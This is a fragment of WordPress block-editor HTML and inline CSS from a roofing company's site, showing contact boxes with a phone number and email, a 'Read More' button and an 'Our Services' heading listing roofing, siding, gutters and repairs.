.skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">(248) 393-5000&nbsp;</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"2019a28c-9fe4-4261-8545-472fe8f25e18\"} -->\n<style type=\"text/css\"> .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2019a28c-9fe4-4261-8545-472fe8f25e18\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"eb27f5f4-746e-46f7-8c6c-1546ed348b06\"} -->\n<style type=\"text/css\"> .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">admin@dunriteroof.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"781513a3-174d-4594-86c8-5daf7f32af16\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-781513a3-174d-4594-86c8-5daf7f32af16 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"fead57cb-9c5c-411a-bb72-20bd150b5268\"} -->\n<style type=\"text/css\"> .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-fead57cb-9c5c-411a-bb72-20bd150b5268 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"57952f87-1484-4ebd-851f-822a3d450cc3\"} -->\n<style type=\"text/css\"> .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-57952f87-1484-4ebd-851f-822a3d450cc3\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"b7d6108a-a14d-4498-85a9-8c42833b5557\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-b7d6108a-a14d-4498-85a9-8c42833b5557\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Roofing, Siding, Gutters, Repairs</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column 